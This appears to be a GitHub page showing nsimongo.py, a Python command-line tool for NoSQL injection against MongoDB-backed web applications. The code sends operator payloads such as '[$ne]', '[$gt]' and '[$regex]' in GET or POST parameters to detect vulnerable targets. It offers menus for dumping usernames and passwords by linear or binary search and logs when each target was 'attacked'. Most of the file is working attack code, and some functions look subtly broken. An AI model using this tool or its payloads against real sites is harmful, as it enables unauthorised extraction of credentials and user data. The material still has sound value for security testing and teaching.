-
Notifications
You must be signed in to change notification settings - Fork 0
/
nsimongo.py
195 lines (160 loc) · 5.31 KB
/
nsimongo.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
import requests
import urllib3
import urllib
from _helper import *
import random
import string
from requests_html import HTMLSession
from termcolor import colored
import time
import algos.linear as linear
import algos.binary as binary
import os
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
from bs4 import BeautifulSoup
urllib3.disable_warnings()
def vulnTest(nsi):
arr = ["[$ne]", "[$gt]"]
x = Str.randStr(8)
phaseTest = None
session = HTMLSession()
vulnerable = []
for v in arr:
phaseTest = v
form_data = {}
for element in nsi.params:
element = element.replace("*", "")
if ":" in element:
element = element.split(":")[0]
if v == "[$gt]":
form_data[element + v] = "&"
else:
form_data[element + v] = x
if nsi.reqMethod == "1": # get
reqData = Str.http_build_query(form_data)
r = session.get(nsi.url)
rInj = session.get(nsi.url + "?" + reqData)
else:
r = requests.post(nsi.url)
rInj = session.post(nsi.url, data=form_data)
# print("ori:"+r.text)
# print("inj:"+rInj.text)
resOri = BeautifulSoup(r.text, "lxml")
resInj = BeautifulSoup(rInj.text, "lxml")
# print(resOri.body)
if resOri.body == resInj.body:
vulnerable.append({v: False})
print(colored(f"Not vulnerable with {phaseTest} Injection", "red"))
else:
vulnerable.append({v: True})
nsi.successIdentifier = rInj.text
print(colored(f"Possible vulnerable to {phaseTest} Injection!", "green"))
return vulnerable
def isVulnerable(arr):
for item in arr:
if True in item.values():
return True
else:
return False
def typeReqPayload(nsi):
print(nsi.info())
print(
colored(
"\n=================\n[Request Method]\n\n1) Send Request as GET\n2) Send Request as POST\n",
"yellow",
)
)
nsi.reqMethod = input("Choose Request Method >>")
return nsi.reqMethod
def paramMenu(nsi):
print(nsi.info())
print(
colored(
f"\n=================\n[Dump Type]\n\n1) Dump data without known value\n2) Dump data by known value\n",
"yellow",
)
)
nsi.typeParam = input("Choose One >>")
msg = "Input Param>>"
if nsi.typeParam == "2":
msg = "Input Param (separate with colon ex -> key:value)>>"
while nsi.param != "d":
print('press "d" for submit the param')
nsi.param = input(msg)
if nsi.param != "d":
nsi.params.append(nsi.param)
return nsi.typeParam
def algMenu(nsi):
print(nsi.info())
print(
colored(
"\n=================\n[Choose Algorithm]\n\n1) Linear Search\n2) Binary Search\n",
"yellow",
)
)
nsi.alg = input("Choose Algorithm >>")
return nsi.alg
def history(nsi):
current_directory = os.getcwd()
files = os.listdir(current_directory)
log_files = [file for file in files if file.startswith("log-") and file.endswith(".xlsx")]
if len(log_files) == 0:
print(colored("No log files found in the current directory.", "yellow"))
return
print(colored("\n=================\n[History]\n", "yellow"))
for file in log_files:
filepath = os.path.join(current_directory, file)
value = Report.readExcel(filepath)
print(f"File: {file}")
print(f"URL Target: {value[0]}")
print(f"Attacked At: {value[1]}")
print("---------------------")
def slinear(nsi):
password = ""
# length = ""
form_data = {}
for element in nsi.params:
if "*" in element:
element = element.replace("*", "")
form_data[element + "[$regex]"] = ""
elif ":" in element:
element = element.split(":")
form_data[element[0] + "[$eq]"] = element[1]
else:
form_data[element + "[$ne]"] = "."
if nsi.typeParam == "2": # known value
linear.dumpKnownValue(nsi, form_data, password)
else: # unknown value (dump usernames or passwords)
linear.getPrefix(nsi, form_data)
def sbin(nsi):
password = ""
form_data = {}
for element in nsi.params:
if "*" in element:
element = element.replace("*", "")
form_data[element + "[$regex]"] = ""
elif ":" in element:
element = element.split(":")
form_data[element[0] + "[$eq]"] = element[1]
else:
form_data[element + "[$ne]"] = "."
if nsi.typeParam == "2": # known value
binary.dumpKnownValue(nsi, form_data, password)
else: # unknown value (dump usernames or passwords)
binary.getPrefix(nsi, form_data)
def getResponseBodyHandlingErrors(req):
try:
responseBody = urllib3.urlopen(req).read()
except urllib3.HTTPError as err:
responseBody = err.read()
return responseBody
def checkWeb(url):
print("Checking to see if site at " + str(url).strip() + " is up...")
tester = WebAppTester(url)
if tester.is_up():
print(colored("✓ The target is up. Starting injection test !", "green"))
else:
print(colored("The target is might be down", "red"))
return 0